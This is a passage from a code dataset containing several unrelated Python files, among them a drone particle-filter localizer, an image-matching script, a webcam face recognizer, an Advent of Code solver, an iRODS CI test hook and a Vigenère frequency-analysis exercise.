------------------------------------------------------------------------#\n\n\n\t# -------------- PERFORMANCE ASSESSMENT AND RESULT PLOTTING --------------#\n\t\n\tdef plot_trajectory(self, estimated_traj, true_traj, plot_title=\"Flight Trajectory\"):\n\t\t'''\n\t\tPlot estimated and true trajectories (only considers x and y values).\n\t\tArgs:\n\t\t\testimated_traj: x,y-value pairs of trajectory estimated with particle filter\n\t\t\t\t true_traj: x,y-value pairs of trajectory declared in ground truth\n\t\t\t\tplot_title: title for the plot\n\t\t'''\n\n\t\t# initialize plot\n\t\tfig, ax = plt.subplots()\n\t\tax.title.set_text(plot_title)\n\n\t\t# show map\n\t\timg = plt.imread(self.processor.map_file)\n\t\tax.imshow(img)\n\n\t\t# plot trajectories\n\t\tax.plot(estimated_traj[:,0], estimated_traj[:,1], 'r', label=\"Estimated Trajectory\")\n\t\tax.plot(true_traj[:,0], true_traj[:,1], label=\"True Trajectory\")\n\t\tax.legend()\n\t\tax.set_xlabel(\"X-values (pixels)\")\n\t\tax.set_ylabel(\"Y-values (pixels)\")\n\t\tplt.show()\n\n\n\tdef collect_mean_data(self, true_traj, runs=5, measurement=\"sse\"):\n\t\t'''\n\t\tCalculate mean errors and variances in trajectory between the runs.\n\t\tArgs:\n\t\t\ttrue_traj: array with x,y-value pairs of true trajectory\n\t\t\t\t runs: number of times to run the particle filter\n\t\tReturns mean errors and variances.\n\t\t'''\n\t\terrors = []\n\t\tvariances = []\n\t\tfor i in range(runs):\n\t\t\tprint(\"ITERATION:\", i+1)\n\t\t\testimated_traj, variance_traj = self.process_flight(measurement=measurement)\n\t\t\tself.odometry.reset_frames()\n\t\t\tself.filter.reset_particles()\n\n\t\t\terror_xy = np.abs(estimated_traj - true_traj)\n\t\t\terror_traj = np.hypot(error_xy[:,0], error_xy[:,1])\n\n\t\t\terrors.append(error_traj)\n\t\t\tvariances.append(variance_traj)\n\n\t\tmean_err = np.mean(np.array(errors), axis=0)\n\t\tmean_var = np.mean(np.array(variances), axis=0)\n\t\treturn mean_err, mean_var\n\n\n\tdef plot_errors(self, mean_err, plot_title=\"Mean Trajectory Errors\"):\n\t\t'''\n\t\tPlot mean errors in trajectory.\n\t\tArgs:\n\t\t\t mean_err: mean errors on each camera frame\n\t\t\tplot_title: title of the plot\n\t\t'''\n\t\tplt.title(plot_title)\n\t\tplt.plot(np.arange(1, mean_err.shape[0]+1), mean_err)\n\t\tplt.xlabel(\"Iteration (Camera Frame Number)\")\n\t\tplt.ylabel(\"Mean Trajectory Error (pixels, 1px ~ 0.25m)\")\n\t\tplt.show()\n\n\n\tdef plot_variances(self, mean_var, plot_title=\"Mean Position Variances\"):\n\t\t'''\n\t\tPlot mean variances of position.\n\t\tArgs:\n\t\t\tmean_var: mean variances in x and y coordinates on each camera frame\n\t\t plot_title: title of the plot\n\t\t'''\n\t\tplt.title(plot_title)\n\t\tplt.plot(np.arange(1, mean_var.shape[0]+1), mean_var[:,0], label=\"along x-axis\")\n\t\tplt.plot(np.arange(1, mean_var.shape[0]+1), mean_var[:,1], label=\"along y-axis\")\n\t\tplt.xlabel(\"Iteration (Camera Frame Number)\")\n\t\tplt.ylabel(\"Mean Variance (pixels, 1px ~ 0.25m)\")\n\t\tplt.legend()\n\t\tplt.show()\n\t# ------------------------------------------------------------------------#\n\n\n\t# ----------------------------- LOCALIZATION -----------------------------#\n\tdef process_flight(self, measurement=\"brief\"):\n\t\tprint(\"Begin processing flight.\")\n\n\t\t# initialize objects\n\t\tprocessor = self.get_processor()\n\t\tp_filter = self.get_filter()\n\t\todometry = self.get_odometry()\n\t\tprint(\"All objects initialized.\")\n\n\t\t# initialize MCL particles\n\t\tp_filter.initialize_particles()\n\t\tparticles = p_filter.particles\n\t\tprint(\"MCL particles initialized.\")\n\n\t\tmean_positions = []\n\t\tvar_positions = []\n\t\ttimer_start = time.time()\n\t\t# process all flight images\n\t\tfor i in range(2, odometry.last_frame+1):\n\t\t\t# get camera image\n\t\t\tframe = processor.get_camera_image(i)\n\t\t\tprint(\"Frame {}:\".format(i))\n\n\t\t\t# extract mean optical flow, update particle positions\n\t\t\tdx, dy = odometry.process_next_frame()\n\t\t\tp_filter.motion_update(dx, dy)\n\n\t\t\tprint(\"Received motion update from odometry: {:.3f}, {:.3f}\".format(dx, dy))\n\t\t\tprint(\"Begin measuring particles.\")\n\n\t\t\t# keep frame resize constant to conserve resources (downscale by ~half on each side)\n\t\t\tframe = processor.adjust_for_height(frame, drone_height=90)\n\t\t\tframe_prediction = processor.construct_prediction(frame)\n\t\t\tpred_shape = [frame_prediction.shape[0], frame_prediction.shape[1]]\n\n\t\t\t# weigh particles\n\t\t\tweights = []\n\t\t\tfor particle in particles:\n\t\t\t\tx, y, z, angle = particle[0], particle[1], particle[2], particle[3]\n\t\t\t\tparticle_prediction = processor.get_particle_area(pX=x, pY=y, angle=angle,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tw=pred_shape[1], h=pred_shape[0])\n\t\t\t\tif measurement == \"sse\":\n\t\t\t\t\tweight = calc_weight_sse(frame_prediction, particle_prediction)\n\t\t\t\telse:\n\t\t\t\t\tweight = calc_weight_brief(frame_prediction, particle_prediction)\n\t\t\t\tweights.append(weight)\n\n\t\t\t# update particle weights, resample\n\t\t\tp_filter.sensor_update(np.array(weights))\n\t\t\tp_filter.resample()\n\n\t\t\tpos_mean, pos_var = p_filter.estimate()\n\t\t\tmean_positions.append(pos_mean)\n\t\t\tvar_positions.append(pos_var)\n\t\t\tprint(\"Mean:\", np.round(pos_mean,3))\n\t\t\tprint(\"Variance: {}\\n\".format(np.round(pos_var,3)))\n\n\t\tprint(\"\\nTotal time: {:.3f} seconds.\".format(time.time()-timer_start))\n\t\ttrajectory = np.array(mean_positions)[:, :2]\n\t\tvar_positions = np.array(var_positions)[:, :2]\n\t\treturn trajectory, var_positions\n\n\nif __name__ == \"__main__\":\n\n\t# declare paths to camera images for each flight\n\tcamera_flight1 = \"../data/camera_feed/Flight1/\"\n\tcamera_flight2 = \"../data/camera_feed/Flight2/\"\n\n\t# global maps files\n\tmap1_file = \"../data/maps/AdM-01-2014.jpg\"\n\tmap2_file = \"../data/maps/AdM-03-2014.jpg\"\n\n\t# ground truth files\n\ttruth_flight1 = \"../data/ground_truth/Flight1/traj_truth.txt\"\n\ttruth_flight2 = \"../data/ground_truth/Flight2/traj_truth.txt\"\n\n\t# learning model weights\n\tweights_file = \"../data/learning_model/sat6_weights.hdf5\"\n\n\n\t# simulate flight 1 on map 1 and plot results\n\tlocalizer_fl1_map1 = Localizer(map1_file, camera_flight1, weights_file, frames=358, num_particles=1000)\n\testimated_traj = localizer_fl1_map1.process_flight()[0]\n\ttrue_traj = localizer_fl1_map1.get_processor().read_truth(truth_flight1)\n\tlocalizer_fl1_map1 = plot_trajectory(estimated_traj, true_traj, plot_title=\"Flight Trajectory\")\n\n\t\n\n\n\n\n\n","sub_path":"source/Localizer.py","file_name":"Localizer.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"11034850","text":"import unittest\nimport os\nos.chdir(r'../')\n\nimport Utils\nfrom SPARQLGenerator import SPARQLGeneratorClass\n\n\n\n\nclass BaseTestClass(unittest.TestCase):\n def test_dynamic_average_question_type_one(self):\n statement = \"Could you tell me what is average for sensor3 in machine3?\"\n queryLinkedFactory = Utils.questionMarkProcess(statement)\n result_selenium = SPARQLGeneratorClass.queryTestingSelenium(queryLinkedFactory)\n self.assertEqual(result_selenium.get('avg'), '6.33333')\n\n def test_dynamic_average_indicative_question(self):\n statement = \"I need to learn an average for sensor1 in machine1?\"\n queryLinkedFactory = Utils.questionMarkProcess(statement)\n result_selenium = SPARQLGeneratorClass.queryTestingSelenium(queryLinkedFactory)\n self.assertEqual(result_selenium.get('avg'), '6.33333')\n\n\n #@unittest.skip(\"Last query will be tested\")\n def test_dynamic_average_question_type_two(self):\n statement = \"What is the average of sensor3 in machine3?\"\n queryLinkedFactory = Utils.questionMarkProcess(statement)\n result_selenium = SPARQLGeneratorClass.queryTestingSelenium(queryLinkedFactory)\n self.assertNotEqual(result_selenium.get('avg'), '6.33333')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"AlgorithmQuestionAnswering/Tests/TestDynamicTriples.py","file_name":"TestDynamicTriples.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"180336680","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 20 14:50:10 2017\n\n@author: gramirez\n\"\"\"\n#We load the actual libraries and prepare de data//Cargamos todo las librerias y preparamos los datos\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport random as rd\n\n\n#Loading the direction.txt that let us have all the loaded directory//Carga todas las direcciones de la lista en base a un txt\ndef reading(archivo):\n \n with open(archivo, 'r') as f:\n direccion = [line.strip() for line in f]\n \n return direccion\n \ndes = []\ndeter = []\nimagenes = []\nkp = []\n\nbf = cv2.BFMatcher()\n\n\n#just for the project\ndireccion = reading(\"defensa.txt\")\nif(False):\n \n direccion2= reading(\"eiffel.txt\")\n direccion3= reading(\"general.txt\")\n direccion4= reading(\"invalides\")\n direccion5= reading(\"louvre\")\n direccion6= reading(\"moulinrouge\")\n direccion7= reading(\"museedorsay\")\n direccion8= reading(\"notredame\")\n direccion9= reading(\"pompidou\")\n direccion10= reading(\"sacrecoeur\")\n direccion10= reading(\"triomphe\")\n \n \n\n#DATASET\n\ndefense = load(direccion)\n\n\n\n\n#we get kp,ds\n\ndefense_kp,defense_des = get_det(defense)\n\n\n\n\n\n#Temporal trying\nFLANN_INDEX_KDTREE = 0\n\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n\nsearch_params = dict(checks=50) # or pass empty dictionary\n\n\nflann = cv2.FlannBasedMatcher(index_params,search_params)\n\n\n#Temporal array with list of images// Lista temporal con datos del arreglo\n#direcciones = [\"graffiti/graff/img1.png\",\"graffiti/graff/img2.png\",\"graffiti/graff/img3.png\",\"graffiti/graff/img4.png\",\"graffiti/boat/img4.png\",\"graffiti/boat/img5.png\",\"graffiti/boat/img6.png\"]\n\nsift = cv2.xfeatures2d.SIFT_create()\n\ndef create_imgdata(image):\n data = []\n kp_t,des_t = sift.detectAndCompute(image,None)\n temp = (image, kp_t, des_t)\n data.append(temp)\n return data\n\ndef cargar(link): #Load each file//Carga cada archivo\n img = cv2.imread(link)\n return img\n\ndef get_data(img): #Get the datato copile, just for Test//Coge los datos, solo para pruebas\n kp1, des1 = sift.detectAndCompute(img,None)\n print(bf) \n print(\"Done\") \n return des1\n\n\n\ndef get_deter(arreglo): #Give the KP and DES from the array//Coje los datos de discrimiante del arreglo\n respuesta = []\n respuesta2 = []\n for imagen in arreglo:\n kp, des = sift.detectAndCompute(imagen,None)\n respuesta.append(kp)\n respuesta2.append(des)\n return respuesta, respuesta2\n\n#def match(kp1,kp2,des1,des2): #For test uses//Para pruebas\ndef match(des1,des2): #For test uses//Para pruebas\n \n #bf = cv2.BFMatcher()\n #matches = bf.knnMatch(des1,des2, k=2)\n matches = flann.knnMatch(des1,des2,k=2)\n good = 0\n #for m,n in matches:\n # if m.distance < 0.75*n.distance:\n # #good.append([m]) \n # good = good + 1\n return good \n\n\ndef running(img_data,arregloi,arreglok,arreglod): #Calculate the list of most similar images// Calcula una lista con las imagenes mas similares\n top = 0\n for i in range(0,len(arregloi)-1):\n #temp = match(img_data[0][1],arreglok[i],img_data[0][2],arreglod[i])\n temp = match(img_data[0][2],arreglod[i])\n data = (temp,i)\n #temp = flann.knnMatch(,des2,k=2)\n top.append(data)\n top = top+1\n #return sorted(top,key=lambda order:order[0],reverse = True)\n return top\n\ndef matching(img,img2): #codigo de referencia // reference code\n sift = cv2.xfeatures2d.SIFT_create()\n kp1, des1 = sift.detectAndCompute(img,None)\n kp2, des2 = sift.detectAndCompute(img2,None)\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(des1,des2, k=2)\n good = []\n for m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m]) \n img3 = cv2.drawMatchesKnn(img,kp1,img2,kp2,good,None,flags=2)\n show_inside(img3)\n return len(good) \n\ndef load(arreglo): #Carga de imagenes\n respuesta = []\n for direccion in arreglo:\n temp = cargar(direccion)\n if temp != None : \n respuesta.append(cargar(direccion))\n if temp == None:\n print(direccion)\n return respuesta\n\n\ndef result(respuesta,tope): #Resultado\n for i in range(0,tope):\n picture1 = imagenes[respuesta[i][1]]\n show(picture1)\n return\n\ndef show(temp):\n plt.imshow(temp)\n plt.show()\n return\n\n#We start the parameters for a quick use////Iniciamos los parametros para cargar imagenes y datos\n#imagenes = load(direcciones)\n#kp,des = get_deter(imagenes)\n \n ","sub_path":"winter_final.py","file_name":"winter_final.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"485908155","text":"import cv2\nimport numpy as np\nimport os\nsize=4\nhaar_file = 'haarcascade_frontalface_default.xml'\ndataset='dataset'\n\nprint('Recognizing Face Please Be in sufficient light')\n\n(images,lables,names,id)=([],[],{},0)\nfor (subdirs,dirs,files) in os.walk(dataset):\n for subdir in dirs:\n names[id]=subdir\n subjectpath=os.path.join(dataset,subdir)\n for filename in os.listdir(subjectpath):\n path=subjectpath + '/' + filename\n lable=id\n images.append(cv2.imread(path,0))\n lables.append(int(lable))\n id=id+1\n\n(width,height)=(130,100)\n\n(images,lables)=[np.array(lis) for lis in [images,lables]]\n\n\nmodel=cv2.face.LBPHFaceRecognizer_create()\nmodel.train(images,lables)\n\n\nface_cascade=cv2.CascadeClassifier(haar_file)\nwebcam=cv2.VideoCapture(0)\nwhile True:\n (_,im)=webcam.read()\n gray=cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\n faces=face_cascade.detectMultiScale(gray,1.3,5)\n for (x,y,w,h) in faces:\n cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n face=gray[y:y+h,x:x+w]\n face_resize=cv2.resize(face,(width,height))\n prediction=model.predict(face_resize)\n cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),3)\n \n if prediction[1]<99:\n \n cv2.putText(im, '% s - %.0f' % (names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0)) \n else:\n cv2.putText(im,'not recognized',(x-10,y-10),cv2.FONT_HERSHEY_PLAIN,1,(0,255,0))\n \n cv2.imshow('OpenCV',im)\n \n \n if cv2.waitKey(1) & 0xFF==ord('q') :\n break\n \n ","sub_path":"face_recognizer.py","file_name":"face_recognizer.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"359128037","text":"import utils\nfrom day_03_inputs import wires, traverse_tests, traverse_tests_2\n\n\n@utils.timer\ndef traverse_wires(wire_a, wire_b, return_manhattan=True):\n # extract path (in x, y coordinates) from wires\n path_a = extract_path_from_wire(wire_a)\n path_b = extract_path_from_wire(wire_b)\n\n intersections = [] # for manhattan distance]\n detailed_intersections = [] # for steps total\n\n # check each line segment from wire_a with all segments from wire_b\n for idx_a in range(0, len(path_a) - 1):\n line_a = [path_a[idx_a], path_a[idx_a + 1]]\n\n for idx_b in range(0, len(path_b) - 1):\n line_b = [path_b[idx_b], path_b[idx_b + 1]]\n\n exists, coords = check_for_intersection(line_a, line_b)\n\n if exists:\n if return_manhattan:\n intersections.append(tuple(coords))\n else:\n path_steps = (idx_a, idx_b)\n pre_intersection_coords = (path_a[idx_a], path_b[idx_b])\n detailed_intersections.append(\n (path_steps, pre_intersection_coords, coords))\n\n if return_manhattan:\n return min([sum([abs(x), abs(y)]) for x, y in intersections])\n else:\n least_steps = None\n\n # int_coords, int as in abbr for intersection\n for steps, pres, int_coords in detailed_intersections:\n step_a, step_b = steps # direction-steps up to intersection\n pre_a, pre_b = pres # coordinates before intersection\n\n wire_a_steps = count_steps(wire_a, step_a, pre_a, int_coords)\n wire_b_steps = count_steps(wire_b, step_b, pre_b, int_coords)\n\n total_steps = wire_a_steps + wire_b_steps\n\n if least_steps is None:\n least_steps = total_steps\n else:\n least_steps = min(least_steps, total_steps)\n\n return least_steps\n\n\ndef count_steps(wire, steps, pre_coords, int_coords):\n total = 0\n\n # add the integer values from the wire-directions\n for idx in range(0, steps):\n direction = wire[idx]\n total += int(direction[1:])\n\n x1 = pre_coords[0]\n y1 = pre_coords[1]\n x2 = int_coords[0]\n y2 = int_coords[1]\n\n # add the difference between the pre-intersection coords and\n # intersection coords\n total += (max(x1, x2) - min(x1, x2)) + (max(y1, y2) - min(y1, y2))\n return total\n\n\ndef extract_path_from_wire(wire, origin=[0, 0]):\n path = [origin]\n\n # append coordinates for each direction in inputs\n for direction in wire:\n next_coords = get_next_coords(path[-1], direction)\n path.append(next_coords)\n\n return path\n\n\ndef get_next_coords(coords, direction):\n next_coords = coords.copy()\n direction, distance = direction[0], int(direction[1:])\n\n # x-axis [0] / y-axis [1]\n change_pos = 0 if direction in {\"R\", \"L\"} else 1\n # positive / negative axis movement\n multiplier = 1 if direction in {\"U\", \"R\"} else -1\n\n next_coords[change_pos] = next_coords[change_pos] + (distance * multiplier)\n return next_coords\n\n\ndef check_for_intersection(line_a, line_b):\n exists = False\n coords = [None, None]\n\n # sp = static position, r = range\n sp_a, ra_start, ra_end = static_pos_and_range(*line_a)\n sp_b, rb_start, rb_end = static_pos_and_range(*line_b)\n\n # if both static positions are equal, they are parallel / no intersection\n if sp_a == sp_b:\n return exists, coords\n\n static_val_a = line_a[0][sp_a]\n static_val_b = line_b[0][sp_b]\n\n # check if static value of line is within the other line's range\n a_in_b_range = rb_start <= static_val_a <= rb_end\n b_in_a_range = ra_start <= static_val_b <= ra_end\n\n # if both are true, the line intersects at the two static values\n exists = a_in_b_range and b_in_a_range\n # place the values with the relative static position\n coords[sp_a] = static_val_a\n coords[sp_b] = static_val_b\n\n # the origin does not count as an intersection\n if coords == [0, 0]:\n exists = False\n\n return exists, coords\n\n\ndef static_pos_and_range(coord_a, coord_b):\n # set static and range list positions\n if coord_a[0] == coord_b[0]:\n static_pos, r_pos = 0, 1\n elif coord_a[1] == coord_b[1]: # this could probably be 'else'\n static_pos, r_pos = 1, 0\n\n # set range start and end values\n r = [coord_a[r_pos], coord_b[r_pos]]\n r_start = min(r)\n r_end = max(r)\n\n return static_pos, r_start, r_end\n\n\ndef test_traverse_wires():\n print(\"---Testing manhattan distance...---\")\n for test, answer in traverse_tests:\n wire_a, wire_b = test\n assert traverse_wires(wire_a, wire_b) == answer\n print(\"---Test over---\\n\")\n\n\ndef test_traverse_wires_2():\n print(\"---Testing steps distance...---\")\n for test, answer in traverse_tests_2:\n wire_a, wire_b = test\n assert traverse_wires(wire_a, wire_b, return_manhattan=False) == answer\n print(\"---Test over---\\n\")\n\n\ntest_traverse_wires()\ntest_traverse_wires_2()\n\nwire_a, wire_b = wires\n# Part 1 Time: ~0.17 seconds\nprint(traverse_wires(wire_a, wire_b)) # 2180\n# Part 2 Time: ~0.14 seconds\nprint(traverse_wires(wire_a, wire_b, return_manhattan=False)) # 112316\n","sub_path":"day_03_answers_save.py","file_name":"day_03_answers_save.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"430186980","text":"from __future__ import print_function\n\nimport optparse\nimport os\nimport shutil\nimport glob\nimport time\nimport irods_python_ci_utilities\n\ndef install_cmake_and_add_to_front_of_path():\n irods_python_ci_utilities.install_os_packages(['irods-externals-cmake3.5.2-0'])\n os.environ['PATH'] = '/opt/irods-externals/cmake3.5.2-0/bin' + os.pathsep + os.environ['PATH']\n\ndef get_build_prerequisites_all():\n return ['irods-externals-clang3.8-0',\n 'irods-externals-cppzmq4.1-0',\n 'irods-externals-libarchive3.1.2-0',\n 'irods-externals-avro1.7.7-0',\n 'irods-externals-clang-runtime3.8-0',\n 'irods-externals-boost1.60.0-0',\n 'irods-externals-jansson2.7-0',\n 'irods-externals-zeromq4-14.1.3-0']\n\ndef get_build_prerequisites_apt():\n return ['libstdc++6', 'libcurl4-gnutls-dev', 'make', 'libssl-dev', 'gcc', 'g++', 'libfuse-dev'] + get_build_prerequisites_all()\n\ndef get_build_prerequisites_yum():\n return ['curl-devel', 'openssl-devel', 'gcc-g++', 'fuse', 'fuse-devel'] + get_build_prerequisites_all()\n\ndef get_build_prerequisites():\n dispatch_map = {\n 'Ubuntu': get_build_prerequisites_apt,\n 'Centos': get_build_prerequisites_yum,\n 'Centos linux': get_build_prerequisites_yum,\n 'Opensuse ': get_build_prerequisites_yum,\n }\n try:\n return dispatch_map[irods_python_ci_utilities.get_distribution()]()\n except KeyError:\n irods_python_ci_utilities.raise_not_implemented_for_distribution()\n\ndef install_build_prerequisites_apt():\n if irods_python_ci_utilities.get_distribution() == 'Ubuntu': # cmake from externals requires newer libstdc++ on ub12\n if irods_python_ci_utilities.get_distribution_version_major() == '12':\n irods_python_ci_utilities.install_os_packages(['python-software-properties'])\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'add-apt-repository', '-y', 'ppa:ubuntu-toolchain-r/test'], check_rc=True)\n irods_python_ci_utilities.install_os_packages(['libstdc++6'])\n irods_python_ci_utilities.install_os_packages(get_build_prerequisites())\n\ndef install_build_prerequisites_yum():\n irods_python_ci_utilities.install_os_packages(get_build_prerequisites())\n\ndef install_build_prerequisites():\n dispatch_map = {\n 'Ubuntu': install_build_prerequisites_apt,\n 'Centos': install_build_prerequisites_yum,\n 'Centos linux': install_build_prerequisites_yum,\n 'Opensuse ': install_build_prerequisites_yum,\n }\n try:\n return dispatch_map[irods_python_ci_utilities.get_distribution()]()\n except KeyError:\n irods_python_ci_utilities.raise_not_implemented_for_distribution()\n\ndef main():\n parser = optparse.OptionParser()\n parser.add_option('--output_root_directory')\n parser.add_option('--built_packages_root_directory')\n parser.add_option('--mungefs_packages_directory')\n\n options, _ = parser.parse_args()\n\n output_root_directory = options.output_root_directory\n built_packages_root_directory = options.built_packages_root_directory\n package_suffix = irods_python_ci_utilities.get_package_suffix()\n os_specific_directory = irods_python_ci_utilities.append_os_specific_directory(built_packages_root_directory)\n irods_python_ci_utilities.install_os_packages_from_files(glob.glob(os.path.join(os_specific_directory, 'irods-rule-engine-plugin-storage-tiering*.{0}'.format(package_suffix))))\n\n irods_python_ci_utilities.install_irods_core_dev_repository()\n install_cmake_and_add_to_front_of_path()\n install_build_prerequisites()\n\n time.sleep(10)\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'chmod', 'g+rwx', '/dev/fuse'], check_rc=True)\n\n time.sleep(10)\n\n try:\n test_output_file = 'log/test_output.log'\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'su', '-', 'irods', '-c', 'python2 scripts/run_tests.py --xml_output --run_s test_plugin_storage_tiering 2>&1 | tee {0}; exit $PIPESTATUS'.format(test_output_file)], check_rc=True)\n finally:\n if output_root_directory:\n irods_python_ci_utilities.gather_files_satisfying_predicate('/var/lib/irods/log', output_root_directory, lambda x: True)\n shutil.copy('/var/lib/irods/log/test_output.log', output_root_directory)\n #shutil.copytree('/var/lib/irods/test-reports', os.path.join(output_root_directory, 'test-reports'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"irods_consortium_continuous_integration_test_hook.py","file_name":"irods_consortium_continuous_integration_test_hook.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"288085222","text":"import os\r\n\r\n#If folder not exist then create folder\r\ndef createFolder(folder):\r\n if not os.path.exists(folder):\r\n os.makedirs(folder)\r\n\r\n# Move Files into Folder\r\ndef move(folderName,files):\r\n for file in files:\r\n os.replace(file, f\"{folderName}/{file}\") \r\n \r\n \r\n\r\nfiles = os.listdir()\r\nfiles.remove(\"autoFileCleaner.py\")\r\ncreateFolder('Images')\r\ncreateFolder('Docs')\r\ncreateFolder('Media')\r\ncreateFolder('Others')\r\n\r\nimgExts = [\".png\",\".jpg\",\".jpeg\"]\r\nimages = [file for file in files if os.path.splitext(file)[1].lower() in imgExts ]\r\n\r\ndocExts = [\".txt\",\".docx\",\".doc\",\".pdf\"]\r\ndocs = [file for file in files if os.path.splitext(file)[1].lower() in docExts] \r\n\r\nmediaExts = [\".mp4\",\".mp3\",\".flv\",\".mkv\",\".webm\"]\r\nmedias = [file for file in files if os.path.splitext(file)[1].lower() in mediaExts]\r\n\r\nothers = []\r\nfor file in files:\r\n ext = os.path.splitext(file)[1].lower()\r\n if (ext not in mediaExts) and (ext not in docExts) and (ext not in imgExts):\r\n others.append(file)\r\n\r\n#Move files into created folder\r\nmove(\"Images\",images)\r\nmove(\"Docs\",docs)\r\nmove(\"Media\",medias)\r\nmove(\"Others\",others)","sub_path":"autoFileCleaner.py","file_name":"autoFileCleaner.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"601910287","text":"def list_correlation(position, ciphered):\n d = text_pretreatment('./jane')\n r = list_treatment(lst)\n\ndef text_pretreatment(address):\n from collections import OrderedDict\n f = open(address,'r')\n c = f.read(1)\n dic = {}\n while c:\n if c >= 'a' and c<='z':\n if c in dic:\n dic[c]+=1\n else:\n dic[c]=1\n c = f.read(1) \n sum_ = float(sum(dic.values()))\n d = dict(zip(dic.keys(), map(lambda x : round(round(float(x) / sum_,4) *100,2) , dic.values()))) \n return OrderedDict(sorted(d.items(), key=lambda t: t[1]))\n\n\n\ndef list_treatment(lst):\n dic = {}\n for i in lst:\n if not (i in dic):\n dic[i]=1\n else:\n dic[i]+=1\n\n dict2 = {}\n sum_ = float(sum(dic.values()))\n d = dict(zip(dic.keys(), map(lambda x : round(float(x) / sum_,2) , dic.values())))\n return OrderedDict(sorted(d.items(), key=lambda t: t[1]))\n\ndef regenerate_text(message, key):\n lst = []\n for i in range(key):\n lst.append([])\n for i in range(len(message)):\n lst[i%key] = lst[i%key] + [message[i]]\n return lst \n\ndef main():\n print(text_pretreatment('./jane'))\n \"\"\"print(regenerate_text(\"mioutasasfasf\",9))\n print(list_treatment(['a', 'b', 'a']))\n\"\"\"\n\nif __name__ == '__main__':\n main() ","sub_path":"vig_attack.py","file_name":"vig_attack.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"322334667","text":"import requests\nimport json\n\n\ndef gather_solr_stats():\n r = requests.get(\"http://solr.api.wa.bl.uk/solr/admin/collections?action=CLUSTERSTATUS&wt=json\")\n\n collections = r.json()['cluster']['collections']\n for collection in collections:\n shards = collections[collection]['shards']\n for shard in shards:\n replicas = shards[shard]['replicas']\n for replica in replicas:\n core = replicas[replica]['core']\n base_url = replicas[replica]['base_url']\n status_url = f\"{base_url}/admin/cores?action=STATUS&core={core}&wt=json\"\n r = requests.get(status_url)\n stats = r.json()['status'][core]['index']\n stats['solr_collection'] = collection\n stats['solr_shard'] = shard\n stats['solr_replica'] = replica\n stats['solr_core'] = core\n stats['solr_base_url'] = base_url\n print(json.dumps(stats))\n\n\nif __name__ == '__main__':\n gather_solr_stats()","sub_path":"lib/windex/solr_stats.py","file_name":"solr_stats.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"535769439","text":"#!C:/Python36-32/python.exe\r\nfrom slicer import Slicer\r\nfrom content_reader import ContentReader\r\nfrom v_stacker import VStacker\r\nfrom paper_marker import Marker\r\nimport glob\r\n\r\nprint(\"content-type: text/plain\\n\\n\")\r\nquestions = [\"question1.jpg\", \"question2.jpg\"]\r\nnum_questions = 2\r\nfile_name = \"question1.jpg\"\r\n_obj = Slicer(file_name)\r\n_obj.create_dirs(2, [6, 5])\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Slicing The Paper...\")\r\nfor index in range(0, 2):\r\n file_name = questions[index]\r\n slicer_obj = Slicer(file_name)\r\n slicer_obj.execute_slicer(index + 1)\r\n\r\nimg_count = slicer_obj.get_image_count()\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Reading Content From The Paper\")\r\nreader_obj = ContentReader(img_count)\r\nquestion_num = 1\r\nreader_obj.execute_content_reader(question_num)\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Marking...\")\r\n\r\nscripts = glob.glob(\"Answer_Scripts/Processed/*.json\")\r\nvstacker = VStacker()\r\nfor script in scripts:\r\n marker_obj = Marker(\"memo/Math_Paper_1_Nov_2017/Memo_Paper_1_Math.json\")\r\n marks = marker_obj._mark(script, 0)\r\n vstacker.execute_vstacker(len(questions), marks)\r\n\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Finished Marking\")","sub_path":"Source_Code/Demo_2/Back_End/Marking Module/3_Phase_Marker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"591287656","text":"# this populates the table\nimport csv\nimport psycopg2\n\nconnection = psycopg2.connect(\"dbname=learning_sql user=dbperson\")\n\ncursor = connection.cursor()\n\ncursor.execute(\"DROP TABLE IF EXISTS sports_data;\")\n\ntable_create_command = \"\"\"CREATE TABLE sports_data (\n rank NUMERIC (2),\n athlete VARCHAR (50),\n age NUMERIC (2),\n team VARCHAR (40),\n NOC VARCHAR (5),\n medal VARCHAR 